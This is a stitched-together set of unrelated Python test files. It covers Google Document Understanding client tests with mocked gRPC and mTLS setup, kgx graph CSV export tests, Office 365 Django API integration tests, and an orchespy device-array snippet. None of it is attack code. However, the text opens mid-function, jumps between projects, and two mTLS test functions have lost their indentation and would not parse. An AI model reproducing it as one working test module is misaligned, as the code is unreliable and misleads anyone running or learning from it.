    request = document_understanding.BatchProcessDocumentsRequest()
    request.parent = "parent/value"
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client._client._transport.batch_process_documents), "__call__"
    ) as call:
        # FakeUnaryUnaryCall makes the mocked stub awaitable.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/op")
        )
        await client.batch_process_documents(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
        # Establish that the field header was sent.
        _, _, kw = call.mock_calls[0]
        assert ("x-goog-request-params", "parent=parent/value") in kw["metadata"]
def test_batch_process_documents_flattened():
    """Flattened keyword arguments are folded into the request message."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials()
    )
    with mock.patch.object(
        type(client._transport.batch_process_documents), "__call__"
    ) as rpc:
        rpc.return_value = operations_pb2.Operation(name="operations/op")
        # Invoke via the flattened (keyword-argument) signature rather
        # than building a request object by hand.
        client.batch_process_documents(
            requests=[
                document_understanding.ProcessDocumentRequest(parent="parent_value")
            ]
        )
        # The request handed to the stub must reflect the kwargs.
        assert len(rpc.mock_calls) == 1
        _, call_args, _ = rpc.mock_calls[0]
        assert call_args[0].requests == [
            document_understanding.ProcessDocumentRequest(parent="parent_value")
        ]
def test_batch_process_documents_flattened_error():
    """Mixing a request object with flattened kwargs must raise ValueError."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials()
    )
    # Supplying both forms at once is ambiguous and rejected up front.
    with pytest.raises(ValueError):
        client.batch_process_documents(
            document_understanding.BatchProcessDocumentsRequest(),
            requests=[
                document_understanding.ProcessDocumentRequest(parent="parent_value")
            ],
        )
@pytest.mark.asyncio
async def test_batch_process_documents_flattened_async():
    """Flattened kwargs are folded into the request on the async client."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials()
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client._client._transport.batch_process_documents), "__call__"
    ) as call:
        # Designate an appropriate return value for the call. (The original
        # first assigned a bare Operation here and immediately overwrote it
        # with the FakeUnaryUnaryCall below; the dead assignment is removed —
        # only the awaitable wrapper is ever observed by the async surface.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.batch_process_documents(
            requests=[
                document_understanding.ProcessDocumentRequest(parent="parent_value")
            ]
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].requests == [
            document_understanding.ProcessDocumentRequest(parent="parent_value")
        ]
@pytest.mark.asyncio
async def test_batch_process_documents_flattened_error_async():
    """Mixing a request object with flattened kwargs fails on the async client."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials()
    )
    # Supplying both forms at once is ambiguous and must raise.
    with pytest.raises(ValueError):
        await client.batch_process_documents(
            document_understanding.BatchProcessDocumentsRequest(),
            requests=[
                document_understanding.ProcessDocumentRequest(parent="parent_value")
            ],
        )
def test_process_document(transport: str = "grpc"):
    """process_document forwards the request and surfaces the Document."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials(), transport=transport
    )
    # An empty request is fine: proto3 fields are optional and the wire
    # call is mocked below.
    request = document_understanding.ProcessDocumentRequest()
    with mock.patch.object(
        type(client._transport.process_document), "__call__"
    ) as rpc:
        rpc.return_value = document.Document(
            uri="uri_value",
            content=b"content_blob",
            mime_type="mime_type_value",
            text="text_value",
        )
        response = client.process_document(request)
        # The stub saw exactly one call carrying our request object.
        assert len(rpc.mock_calls) == 1
        _, call_args, _ = rpc.mock_calls[0]
        assert call_args[0] == request
    # The stubbed payload comes back unchanged as a Document.
    assert isinstance(response, document.Document)
    assert response.uri == "uri_value"
    assert response.content == b"content_blob"
    assert response.mime_type == "mime_type_value"
    assert response.text == "text_value"
@pytest.mark.asyncio
async def test_process_document_async(transport: str = "grpc_asyncio"):
    """Async process_document forwards the request and returns a Document."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials(), transport=transport
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = document_understanding.ProcessDocumentRequest()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client._client._transport.process_document), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        # FakeUnaryUnaryCall makes the mocked stub awaitable.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            document.Document(
                uri="uri_value",
                content=b"content_blob",
                mime_type="mime_type_value",
                text="text_value",
            )
        )
        response = await client.process_document(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the response is the type that we expect.
    assert isinstance(response, document.Document)
    assert response.uri == "uri_value"
    assert response.content == b"content_blob"
    assert response.mime_type == "mime_type_value"
    assert response.text == "text_value"
def test_process_document_field_headers():
    """URI-bound request fields are propagated as routing headers."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials()
    )
    # A field that appears in the HTTP/1.1 URI must be echoed into the
    # x-goog-request-params metadata entry, so give it a non-empty value.
    request = document_understanding.ProcessDocumentRequest()
    request.parent = "parent/value"
    with mock.patch.object(
        type(client._transport.process_document), "__call__"
    ) as rpc:
        rpc.return_value = document.Document()
        client.process_document(request)
        # One stub call, carrying the request unchanged.
        assert len(rpc.mock_calls) == 1
        _, call_args, _ = rpc.mock_calls[0]
        assert call_args[0] == request
        # The routing header must ride along in the call metadata.
        _, _, call_kwargs = rpc.mock_calls[0]
        assert ("x-goog-request-params", "parent=parent/value") in call_kwargs["metadata"]
@pytest.mark.asyncio
async def test_process_document_field_headers_async():
    """Async variant: URI-bound request fields become routing headers."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials()
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = document_understanding.ProcessDocumentRequest()
    request.parent = "parent/value"
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client._client._transport.process_document), "__call__"
    ) as call:
        # FakeUnaryUnaryCall makes the mocked stub awaitable.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(document.Document())
        await client.process_document(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
        # Establish that the field header was sent.
        _, _, kw = call.mock_calls[0]
        assert ("x-goog-request-params", "parent=parent/value") in kw["metadata"]
def test_credentials_transport_error():
    """Supplying both credentials and a transport instance is rejected."""
    transport = transports.DocumentUnderstandingServiceGrpcTransport(
        credentials=credentials.AnonymousCredentials()
    )
    # The two options are mutually exclusive, so construction must fail.
    with pytest.raises(ValueError):
        DocumentUnderstandingServiceClient(
            credentials=credentials.AnonymousCredentials(), transport=transport
        )
def test_transport_instance():
    """A pre-built transport instance is adopted by the client verbatim."""
    custom_transport = transports.DocumentUnderstandingServiceGrpcTransport(
        credentials=credentials.AnonymousCredentials()
    )
    client = DocumentUnderstandingServiceClient(transport=custom_transport)
    # The client must hold the exact same object, not a copy.
    assert client._transport is custom_transport
def test_transport_get_channel():
    """Both the sync and asyncio gRPC transports expose a usable channel."""
    for transport_cls in (
        transports.DocumentUnderstandingServiceGrpcTransport,
        transports.DocumentUnderstandingServiceGrpcAsyncIOTransport,
    ):
        transport = transport_cls(credentials=credentials.AnonymousCredentials())
        assert transport.grpc_channel
def test_transport_grpc_default():
    """With no explicit transport, the synchronous gRPC transport is used."""
    default_client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials()
    )
    # Default wiring must produce the plain (non-asyncio) gRPC transport.
    assert isinstance(
        default_client._transport,
        transports.DocumentUnderstandingServiceGrpcTransport,
    )
def test_document_understanding_service_base_transport():
    """The abstract base transport raises NotImplementedError everywhere."""
    transport = transports.DocumentUnderstandingServiceTransport(
        credentials=credentials.AnonymousCredentials()
    )
    # Every RPC method on the base class is a stub that must raise.
    for method_name in ("batch_process_documents", "process_document"):
        with pytest.raises(NotImplementedError):
            getattr(transport, method_name)(request=object())
    # The LRO operations client property is likewise unimplemented.
    with pytest.raises(NotImplementedError):
        transport.operations_client
def test_document_understanding_service_auth_adc():
    """Without explicit credentials the client falls back to ADC."""
    with mock.patch.object(auth, "default") as default_adc:
        default_adc.return_value = (credentials.AnonymousCredentials(), None)
        DocumentUnderstandingServiceClient()
        # ADC must be consulted with the cloud-platform scope.
        default_adc.assert_called_once_with(
            scopes=("https://www.googleapis.com/auth/cloud-platform",)
        )
def test_document_understanding_service_transport_auth_adc():
    """Transports built without credentials resolve them via ADC."""
    with mock.patch.object(auth, "default") as default_adc:
        default_adc.return_value = (credentials.AnonymousCredentials(), None)
        transports.DocumentUnderstandingServiceGrpcTransport(host="squid.clam.whelk")
        # ADC must be consulted with the cloud-platform scope.
        default_adc.assert_called_once_with(
            scopes=("https://www.googleapis.com/auth/cloud-platform",)
        )
def test_document_understanding_service_host_no_port():
    """An endpoint without an explicit port is normalized to :443."""
    options = client_options.ClientOptions(
        api_endpoint="us-documentai.googleapis.com"
    )
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials(), client_options=options
    )
    assert client._transport._host == "us-documentai.googleapis.com:443"
def test_document_understanding_service_host_with_port():
    """An endpoint carrying an explicit port keeps that port untouched."""
    options = client_options.ClientOptions(
        api_endpoint="us-documentai.googleapis.com:8000"
    )
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials(), client_options=options
    )
    assert client._transport._host == "us-documentai.googleapis.com:8000"
def test_document_understanding_service_grpc_transport_channel():
    """An explicit channel wins over any mTLS endpoint configuration."""
    channel = grpc.insecure_channel("http://localhost/")
    cert_callback = mock.MagicMock()
    # With a ready-made channel supplied, the mTLS endpoint and the
    # client_cert_source callback must both be ignored.
    transport = transports.DocumentUnderstandingServiceGrpcTransport(
        host="squid.clam.whelk",
        channel=channel,
        api_mtls_endpoint="mtls.squid.clam.whelk",
        client_cert_source=cert_callback,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    assert not cert_callback.called
def test_document_understanding_service_grpc_asyncio_transport_channel():
    """An explicit asyncio channel wins over mTLS endpoint configuration."""
    channel = aio.insecure_channel("http://localhost/")
    cert_callback = mock.MagicMock()
    # With a ready-made channel supplied, the mTLS endpoint and the
    # client_cert_source callback must both be ignored.
    transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
        host="squid.clam.whelk",
        channel=channel,
        api_mtls_endpoint="mtls.squid.clam.whelk",
        client_cert_source=cert_callback,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    assert not cert_callback.called
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_document_understanding_service_grpc_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.DocumentUnderstandingServiceGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
ssl_credentials=mock_ssl_cred,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
)
assert transport.grpc_channel == mock_grpc_channel
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_document_understanding_service_grpc_asyncio_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
ssl_credentials=mock_ssl_cred,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
    "api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_document_understanding_service_grpc_transport_channel_mtls_with_adc(
    grpc_create_channel, api_mtls_endpoint
):
    """With an mTLS endpoint but no cert source, SSL ADC supplies credentials."""
    # Check that if channel and client_cert_source are None, but api_mtls_endpoint
    # is provided, then a mTLS channel will be created with SSL ADC.
    mock_grpc_channel = mock.Mock()
    grpc_create_channel.return_value = mock_grpc_channel
    # Mock google.auth.transport.grpc.SslCredentials class.
    mock_ssl_cred = mock.Mock()
    with mock.patch.multiple(
        "google.auth.transport.grpc.SslCredentials",
        __init__=mock.Mock(return_value=None),
        ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
    ):
        mock_cred = mock.Mock()
        transport = transports.DocumentUnderstandingServiceGrpcTransport(
            host="squid.clam.whelk",
            credentials=mock_cred,
            api_mtls_endpoint=api_mtls_endpoint,
            client_cert_source=None,
        )
        # Whether or not the parametrized endpoint carried a port, the
        # channel must target the normalized host:443 form.
        grpc_create_channel.assert_called_once_with(
            "mtls.squid.clam.whelk:443",
            credentials=mock_cred,
            ssl_credentials=mock_ssl_cred,
            scopes=("https://www.googleapis.com/auth/cloud-platform",),
        )
        assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
    "api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_document_understanding_service_grpc_asyncio_transport_channel_mtls_with_adc(
    grpc_create_channel, api_mtls_endpoint
):
    """Async variant: mTLS endpoint without cert source falls back to SSL ADC."""
    # Check that if channel and client_cert_source are None, but api_mtls_endpoint
    # is provided, then a mTLS channel will be created with SSL ADC.
    mock_grpc_channel = mock.Mock()
    grpc_create_channel.return_value = mock_grpc_channel
    # Mock google.auth.transport.grpc.SslCredentials class.
    mock_ssl_cred = mock.Mock()
    with mock.patch.multiple(
        "google.auth.transport.grpc.SslCredentials",
        __init__=mock.Mock(return_value=None),
        ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
    ):
        mock_cred = mock.Mock()
        transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
            host="squid.clam.whelk",
            credentials=mock_cred,
            api_mtls_endpoint=api_mtls_endpoint,
            client_cert_source=None,
        )
        # Whether or not the parametrized endpoint carried a port, the
        # channel must target the normalized host:443 form.
        grpc_create_channel.assert_called_once_with(
            "mtls.squid.clam.whelk:443",
            credentials=mock_cred,
            ssl_credentials=mock_ssl_cred,
            scopes=("https://www.googleapis.com/auth/cloud-platform",),
        )
        assert transport.grpc_channel == mock_grpc_channel
def test_document_understanding_service_grpc_lro_client():
    """The sync gRPC transport exposes a cached LRO operations client."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials(), transport="grpc"
    )
    lro_transport = client._transport
    ops_client = lro_transport.operations_client
    # The transport hands back an api-core operations client...
    assert isinstance(ops_client, operations_v1.OperationsClient)
    # ...and memoizes it, so repeated access yields the very same object.
    assert lro_transport.operations_client is ops_client
def test_document_understanding_service_grpc_lro_async_client():
    """The asyncio gRPC transport exposes a cached async LRO client."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials(), transport="grpc_asyncio"
    )
    lro_transport = client._client._transport
    ops_client = lro_transport.operations_client
    # The transport hands back an async api-core operations client...
    assert isinstance(ops_client, operations_v1.OperationsAsyncClient)
    # ...and memoizes it, so repeated access yields the very same object.
    assert lro_transport.operations_client is ops_client
|
import os
from kgx import PandasTransformer
# Directory containing this test module; anchor for all fixture paths.
cwd = os.path.abspath(os.path.dirname(__file__))
# Input fixtures (CSV node/edge files) live under resources/.
resource_dir = os.path.join(cwd, 'resources')
# Generated archives and copies are written under target/.
target_dir = os.path.join(cwd, 'target')
def test_load():
    """
    Load node and edge CSV fixtures into a PandasTransformer and save a copy.
    """
    transformer = PandasTransformer()
    os.makedirs(target_dir, exist_ok=True)
    for fixture in ("x1_nodes.csv", "x1_edges.csv"):
        transformer.parse(os.path.join(resource_dir, fixture), input_format='csv')
    transformer.report()
    transformer.save(os.path.join(target_dir, 'x1copy'))
    # w = GraphMLTransformer(t.graph)
    # w.save(os.path.join(target_dir, "x1n.graphml"))
def test_semmeddb_csv():
    """
    Read SemMedDB nodes/edges from CSV and export the graph in every
    supported tar compression flavour.
    """
    transformer = PandasTransformer()
    transformer.parse(os.path.join(resource_dir, "semmed/semmeddb_test_nodes.csv"))
    transformer.parse(os.path.join(resource_dir, "semmed/semmeddb_test_edges.csv"))
    output = os.path.join(target_dir, "semmeddb_test_export")
    # Exercise plain, gzip and bzip2 tar archives in turn.
    for compression in ('tar', 'tar.gz', 'tar.bz2'):
        transformer.save(output, output_format='csv', compression=compression)
def test_semmeddb_csv_to_tsv():
    """
    Read SemMedDB nodes/edges from CSV and export them as TSV inside a tar.
    """
    transformer = PandasTransformer()
    transformer.parse(os.path.join(resource_dir, "semmed/semmeddb_test_nodes.csv"))
    transformer.parse(os.path.join(resource_dir, "semmed/semmeddb_test_edges.csv"))
    output = os.path.join(target_dir, "semmeddb_test_tsv_export")
    # Same graph, but serialized as TSV within a tar archive.
    transformer.save(output, output_format='tsv', compression='tar')
def test_read_achive():  # NOTE: "achive" typo kept -- renaming would change the public test id
    """
    Read back the tar, tar.gz and tar.bz2 archives produced by
    test_semmeddb_csv and check each yields a non-empty graph.
    """
    archives = [
        ("semmeddb_test_export.tar", 'tar'),
        ("semmeddb_test_export.tar.gz", 'tar.gz'),
        ("semmeddb_test_export.tar.bz2", 'tar.bz2'),
    ]
    for filename, compression in archives:
        transformer = PandasTransformer()
        transformer.parse(
            os.path.join(target_dir, filename),
            input_format='csv',
            compression=compression,
        )
        assert not transformer.is_empty()
|
# Copyright (c) Microsoft. All rights reserved. Licensed under the MIT license. See full license at the bottom of this file.
from django.test import TestCase
from django.core.exceptions import ObjectDoesNotExist
from contacts.models import Office365Connection
import contacts.o365service
# Create your tests here.
# Base URL of the Office 365 REST API (v1.0) used by every test below.
api_endpoint = 'https://outlook.office365.com/api/v1.0'
# TODO: Copy a valid, non-expired access token here. You can get this from
# an Office365Connection in the /admin/ page once you've successfully connected
# an account to view contacts in the app. Remember these expire every hour, so
# if you start getting 401's you need to get a new token.
access_token = ''
class MailApiTests(TestCase):
    """Integration tests for the Mail helpers in contacts.o365service.

    These tests call the live Office 365 REST API, so a valid (non-expired)
    access token must be pasted into the module-level ``access_token``
    variable before running them.
    """

    def _require_token(self):
        # Fail fast with the instructive message when no token is set.
        # Bug fix: the original used assertEqual, which is inverted -- it
        # passed on an EMPTY token and failed once a real one was supplied.
        self.assertNotEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')

    def test_create_message(self):
        """Creating a draft message should return 201 Created."""
        self._require_token()
        new_message_payload = '{ "Subject": "Did you see last night\'s game?", "Importance": "Low", "Body": { "ContentType": "HTML", "Content": "They were <b>awesome</b>!" }, "ToRecipients": [ { "EmailAddress": { "Address": "jasonjoh@alpineskihouse.com" } } ] }'
        r = contacts.o365service.create_message(api_endpoint,
                                                access_token,
                                                new_message_payload)
        self.assertEqual(r, 201, 'Create message returned {0}'.format(r))

    def test_get_message_by_id(self):
        """Fetching a message by the id of the first listed message succeeds."""
        self._require_token()
        get_messages_params = '?$top=5&$select=Subject'
        r = contacts.o365service.get_messages(api_endpoint,
                                              access_token,
                                              get_messages_params)
        self.assertIsNotNone(r, 'Get messages returned None.')
        first_message_id = r['value'][0]['Id']
        r = contacts.o365service.get_message_by_id(api_endpoint,
                                                   access_token,
                                                   first_message_id)
        self.assertIsNotNone(r, 'Get message by id returned None.')

    def test_update_message(self):
        """Patching a message's subject should return 200 OK."""
        self._require_token()
        get_messages_params = '?$top=5&$select=Subject'
        r = contacts.o365service.get_messages(api_endpoint,
                                              access_token,
                                              get_messages_params)
        self.assertIsNotNone(r, 'Get messages returned None.')
        first_message_id = r['value'][0]['Id']
        update_payload = '{ "Subject" : "UPDATED" }'
        r = contacts.o365service.update_message(api_endpoint,
                                                access_token,
                                                first_message_id,
                                                update_payload)
        self.assertEqual(r, 200, 'Update message returned {0}.'.format(r))

    def test_delete_message(self):
        """Deleting a message should return 204 No Content."""
        self._require_token()
        get_messages_params = '?$top=5&$select=Subject'
        r = contacts.o365service.get_messages(api_endpoint,
                                              access_token,
                                              get_messages_params)
        self.assertIsNotNone(r, 'Get messages returned None.')
        first_message_id = r['value'][0]['Id']
        r = contacts.o365service.delete_message(api_endpoint,
                                                access_token,
                                                first_message_id)
        self.assertEqual(r, 204, 'Delete message returned {0}.'.format(r))

    def test_send_draft_message(self):
        """Sending an existing draft should return 202 Accepted."""
        self._require_token()
        # Get drafts
        get_drafts = '{0}/Me/Folders/Drafts/Messages?$select=Subject'.format(api_endpoint)
        r = contacts.o365service.make_api_call('GET', get_drafts, access_token)
        response = r.json()
        first_message_id = response['value'][0]['Id']
        send_response = contacts.o365service.send_draft_message(api_endpoint,
                                                                access_token,
                                                                first_message_id)
        # Bug fix: the original asserted on ``r`` (the GET Response object)
        # instead of ``send_response``. The Outlook REST API answers a
        # send action with 202 Accepted.
        self.assertEqual(send_response, 202, 'Send draft returned {0}.'.format(send_response))

    def test_send_new_mail(self):
        """Sending a brand-new message should return 202 Accepted."""
        self._require_token()
        new_message_payload = '{ "Subject": "Sent from test_send_new_mail", "Importance": "Low", "Body": { "ContentType": "HTML", "Content": "They were <b>awesome</b>!" }, "ToRecipients": [ { "EmailAddress": { "Address": "allieb@jasonjohtest.onmicrosoft.com" } } ] }'
        r = contacts.o365service.send_new_message(api_endpoint,
                                                  access_token,
                                                  new_message_payload,
                                                  True)
        self.assertEqual(r, 202, 'Send new message returned {0}.'.format(r))
class CalendarApiTests(TestCase):
    """Integration tests for the Calendar helpers in contacts.o365service.

    These tests call the live Office 365 REST API, so a valid (non-expired)
    access token must be pasted into the module-level ``access_token``
    variable before running them.
    """

    def _require_token(self):
        # Fail fast with the instructive message when no token is set.
        # Bug fix: the original used assertEqual, which is inverted -- it
        # passed on an EMPTY token and failed once a real one was supplied.
        self.assertNotEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')

    def test_create_event(self):
        """Creating an event should return 201 Created."""
        self._require_token()
        new_event_payload = '{ "Subject": "Discuss the Calendar REST API", "Body": { "ContentType": "HTML", "Content": "I think it will meet our requirements!" }, "Start": "2015-01-15T18:00:00Z", "End": "2015-01-15T19:00:00Z", "Attendees": [ { "EmailAddress": { "Address": "alexd@alpineskihouse.com", "Name": "Alex Darrow" }, "Type": "Required" } ] }'
        r = contacts.o365service.create_event(api_endpoint,
                                              access_token,
                                              new_event_payload)
        self.assertEqual(r, 201, 'Create event returned {0}'.format(r))

    def test_get_event_by_id(self):
        """Fetching an event by the id of the first listed event succeeds."""
        self._require_token()
        get_events_params = '?$top=5&$select=Subject,Start,End'
        r = contacts.o365service.get_events(api_endpoint,
                                            access_token,
                                            get_events_params)
        self.assertIsNotNone(r, 'Get events returned None.')
        first_event_id = r['value'][0]['Id']
        r = contacts.o365service.get_event_by_id(api_endpoint,
                                                 access_token,
                                                 first_event_id)
        self.assertIsNotNone(r, 'Get event by id returned None.')

    def test_update_event(self):
        """Patching an event's subject should return 200 OK."""
        self._require_token()
        get_events_params = '?$top=5&$select=Subject,Start,End'
        r = contacts.o365service.get_events(api_endpoint,
                                            access_token,
                                            get_events_params)
        self.assertIsNotNone(r, 'Get events returned None.')
        first_event_id = r['value'][0]['Id']
        update_payload = '{ "Subject" : "UPDATED" }'
        r = contacts.o365service.update_event(api_endpoint,
                                              access_token,
                                              first_event_id,
                                              update_payload)
        self.assertEqual(r, 200, 'Update event returned {0}.'.format(r))

    def test_delete_event(self):
        """Deleting an event should return 204 No Content."""
        self._require_token()
        get_events_params = '?$top=5&$select=Subject,Start,End'
        r = contacts.o365service.get_events(api_endpoint,
                                            access_token,
                                            get_events_params)
        self.assertIsNotNone(r, 'Get events returned None.')
        first_event_id = r['value'][0]['Id']
        r = contacts.o365service.delete_event(api_endpoint,
                                              access_token,
                                              first_event_id)
        self.assertEqual(r, 204, 'Delete event returned {0}.'.format(r))
class ContactsApiTests(TestCase):
    """Integration tests for the Contacts helpers in contacts.o365service.

    These tests call the live Office 365 REST API, so a valid (non-expired)
    access token must be pasted into the module-level ``access_token``
    variable before running them.
    """

    def _require_token(self):
        # Fail fast with the instructive message when no token is set.
        # Bug fix: the original used assertEqual, which is inverted -- it
        # passed on an EMPTY token and failed once a real one was supplied.
        self.assertNotEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')

    def test_create_contact(self):
        """Creating a contact should return 201 Created."""
        self._require_token()
        new_contact_payload = '{ "GivenName": "Pavel", "Surname": "Bansky", "EmailAddresses": [ { "Address": "pavelb@alpineskihouse.com", "Name": "Pavel Bansky" } ], "BusinessPhones": [ "+1 732 555 0102" ] }'
        r = contacts.o365service.create_contact(api_endpoint,
                                                access_token,
                                                new_contact_payload)
        self.assertEqual(r, 201, 'Create contact returned {0}'.format(r))

    def test_get_contact_by_id(self):
        """Fetching a contact by the id of the first listed contact succeeds."""
        self._require_token()
        get_contacts_params = '?$top=5&$select=DisplayName'
        r = contacts.o365service.get_contacts(api_endpoint,
                                              access_token,
                                              get_contacts_params)
        self.assertIsNotNone(r, 'Get contacts returned None.')
        first_contact_id = r['value'][0]['Id']
        r = contacts.o365service.get_contact_by_id(api_endpoint,
                                                   access_token,
                                                   first_contact_id)
        self.assertIsNotNone(r, 'Get contact by id returned None.')

    def test_update_contact(self):
        """Patching a contact's surname should return 200 OK."""
        self._require_token()
        get_contacts_params = '?$top=5&$select=DisplayName'
        r = contacts.o365service.get_contacts(api_endpoint,
                                              access_token,
                                              get_contacts_params)
        self.assertIsNotNone(r, 'Get contacts returned None.')
        first_contact_id = r['value'][0]['Id']
        update_payload = '{ "Surname" : "UPDATED" }'
        r = contacts.o365service.update_contact(api_endpoint,
                                                access_token,
                                                first_contact_id,
                                                update_payload)
        self.assertEqual(r, 200, 'Update contact returned {0}.'.format(r))

    def test_delete_contact(self):
        """Deleting a contact should return 204 No Content."""
        self._require_token()
        get_contacts_params = '?$top=5&$select=DisplayName'
        r = contacts.o365service.get_contacts(api_endpoint,
                                              access_token,
                                              get_contacts_params)
        self.assertIsNotNone(r, 'Get contacts returned None.')
        first_contact_id = r['value'][0]['Id']
        r = contacts.o365service.delete_contact(api_endpoint,
                                                access_token,
                                                first_contact_id)
        self.assertEqual(r, 204, 'Delete contact returned {0}.'.format(r))
# MIT License:
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from orchespy import device, transfer_array
from orchespy.devicetype import Host, VE
import numpy
import nlcpy
@device(Host)
def sum_host(x, y):
    """Add two arrays and return the result, executed on the host device."""
    total = x + y
    return total
@device(VE)
def sum_dev(x, y):
    """Add two arrays and return the result, executed on the VE device."""
    total = x + y
    return total
@device(Host, numpy_module_arg='xp')
def create_host(size, xp):
    """Create a uniform-random array of shape `size` on the host.

    `xp` is injected by the @device decorator as the device's
    numpy-compatible module (numpy for Host).
    """
    return xp.random.rand(*size)
@device(VE, numpy_module_arg='xp')
def create_dev(size, xp):
    """Create a uniform-random array of shape `size` on the VE device.

    `xp` is injected by the @device decorator as the device's
    numpy-compatible module (nlcpy for VE).
    """
    return xp.random.rand(*size)
# Shape of the test arrays (1000*500*500 doubles -- a sizeable allocation).
size = (1000, 500, 500)
x1 = create_host(size)  # created on the host (numpy)
